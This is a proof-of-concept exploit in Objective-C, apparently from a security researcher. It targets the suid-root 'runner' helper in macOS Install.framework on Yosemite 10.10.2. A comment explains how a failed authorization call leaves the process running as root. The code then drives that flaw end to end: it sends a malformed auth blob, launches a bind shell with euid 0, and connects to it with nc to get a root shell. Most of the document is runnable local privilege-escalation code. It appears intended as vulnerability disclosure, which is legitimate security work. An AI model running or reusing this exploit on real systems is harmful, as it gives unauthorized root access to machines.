/*
runner_sploit.m - ianbeer
build: just run the get_shell.sh script to build and run

prereqs: latest xcode (6.2) + yosemite 10.10.2

The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources,
one of which is suid root:

-rwsr-sr-x   1 root  wheel   113K Oct  1  2014 runner

Taking a look at it we can see that it's vending an objective-c Distributed Object :)
[ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]

The main function immediately temporarily drops privs doing
  seteuid(getuid()); setegid(getgid());

then reads line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to lookup that
name in the DO namespace and create a proxy to connect to it via.

It then allocates an IFInstallRunner which in its init method vends itself using a name made up of its pid, time() and random()

It then calls the setRunnerConnectionName method on the proxy to tell it the IFInstallRunner's DO name so that whoever
ran the runner can connect to the IFInstallRunner.

The IFRunnerMessaging protocol tells us the methods and prototypes of the remote methods we can invoke on the IFInstallRunner.

Most of the methods begin with a call to processKey which will set the euid back to root if the process can provide a valid admin
authorization reference from authd (I'm not totally sure how that bit works yet, but it's not important for the bug.) Otherwise the euid
will remain equal to the uid and the methods (like movePath, touchPath etc) will only run with the privs of the user.

The methods then mostly end with a call to restoreUIDs which will drop back to euid==uid if we did temporarily regain root privs (with the auth ref.)

Not all methods we can invoke are like that though...

IFInstallRunner setExternalAuthorizationRef calls

  seteuid(0);setegid(0);

to regain root privs without requiring any auth. It then calls AuthorizationCreateFromExternalForm passing the bytes of an NSData we give it.

If that call doesn't return 0 then the error branch calls syslog with the string: "Fatal error: unable to internalize authorization reference."
but there's actually nothing fatal, it just returns from the method, whereas the success branch goes on to restore euid and egid, which means
that if we can get AuthorizationCreateFromExternalForm to fail then we can get the priv dropping-regaining state machine out-of-sync :)

Getting AuthorizationCreateFromExternalForm to fail is trivial, just provide a malformed auth_ref (like "AAAAAAAAAAAAAAAAAAA" )

Now the next method we invoke will run with euid 0 even without having the correct auth ref :)

This PoC first calls setBatonPath to point the baton executable path to a localhost bind-shell then triggers the bug
and calls runTaskSecurely which will create an NSTask and launch the bind-shell with euid 0 :) We can then just nc to it and get a root shell

tl;dr:
the error path in setExternalAuthorizationRef should either be fatal or drop privs!
*/

#import <objc/Object.h>
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <unistd.h>

const char* vended_server = "fake_server";
const char* suid_binary_path = "/System/Library/PrivateFrameworks/Install.framework/Resources/runner";

char* localhost_shell_path = NULL;

@interface FakeVendor : NSObject
{
@private
  NSString*  runnerConnectionName;
}

- (oneway void) setRunnerPid: (int) pid;
- (oneway void) setRunnerConnectionName: (NSString*) name;
- (void) fork_exec_suid;
- (void) part_2;
- (void) do_shell;

@end

@implementation FakeVendor

- (oneway void) setRunnerPid: (int) pid;
{
  NSLog(@"called setRunnerPid");
  printf("the suid runner's pid is %d\n", pid);
}

- (oneway void) setRunnerConnectionName: (NSString*) name;
{
  NSLog(@"got the IFInstallRunner Distributed Object name:");
  NSLog(name);
  [name retain];
  runnerConnectionName = name;
  [self performSelector:@selector(part_2) withObject:nil afterDelay:0];
}

- (void) fork_exec_suid;
{
  NSLog(@"forking and execing suid child...");
  int fds[2];
  pipe(fds);

  int read_end = fds[0];
  int write_end = fds[1];

  pid_t p = fork();
  if (p == -1) {
    NSLog(@"fork failed?");
    exit(EXIT_FAILURE);
  }
  if (p == 0) {
    // child
    // close the write end of the pipe
    close(write_end);

    // dup2 the read end of the pipe to stdin
    dup2(read_end, STDIN_FILENO);
    
    // execve the suid binary:
    char* argv[] = {suid_binary_path, NULL};
    char* envp[] = {NULL};
    execve(suid_binary_path, argv, envp);
  } else {
    // parent
    // close the read end of the pipe
    close(read_end);
    
    // write the vender_server name to stdin of the suid_binary:
    write(write_end, vended_server, strlen(vended_server));
    write(write_end, "\n", 1);
    NSLog(@"wrote server name to suid stdin");
  }
}

- (void) part_2;
{
  NSLog(@"connecting proxy object to IFInstallRunner...");
  id theProxy;
  theProxy = [[NSConnection
      rootProxyForConnectionWithRegisteredName:runnerConnectionName
      host:nil] retain];

  // set the baton executable path:
  const char* new_baton = localhost_shell_path;
  [theProxy setBatonPath:@(new_baton)];

  NSLog(@"triggering bad error path in setExternalAuthorizationRef...");
  const char* bad = "AAAAAAAAAAAAAAAAAAAA";
  NSData* myData = [NSData dataWithBytes: bad length: 20];
  [theProxy setExternalAuthorizationRef: myData];

  NSLog(@"next DO method will run with euid:0 :)");

  NSTask* t = [NSTask alloc];
  [t init];

  [t setLaunchPath:@(new_baton)];
  [t setArguments: [NSArray arrayWithObjects: @"ignored", nil]];
  [t setEnvironment: [NSDictionary dictionaryWithObjectsAndKeys: @"foo", @"bar", nil]];
  [t setCurrentDirectoryPath: @"/"];

  NSLog(@"running localhost_shell as root...");
  [theProxy runTaskSecurely:t withKey:0 onPort:@"something"];
  NSLog(@"wait a sec for shell...");
  [self performSelector:@selector(do_shell) withObject:nil afterDelay:1];
}

- (void) do_shell;
{
  NSLog(@"got root? should be connected to a localhost bind shell:");
  system("nc localhost 54321");
  NSLog(@"Control-C to quit..");
}

@end


int main (int argc, const char * argv[]) {
  if (argc < 2) {
    printf("usage: ./%s </full/path/to/localhost_shell>\n");
    return EXIT_SUCCESS;
  }

  localhost_shell_path = argv[1];

  FakeVendor* serverObject = [FakeVendor alloc];
  [serverObject init];

  NSConnection *theConnection;
    
  theConnection = [NSConnection defaultConnection];
  [theConnection retain];
  
  [theConnection setRootObject:serverObject];
  if ([theConnection registerName:@(vended_server)] == NO) {
    NSLog(@"couldn't register object name");
  }

  NSLog(@"starting run loop");

  [serverObject performSelector:@selector(fork_exec_suid) withObject:nil afterDelay:0];

  [[NSRunLoop currentRunLoop] run];
  return 0;
}

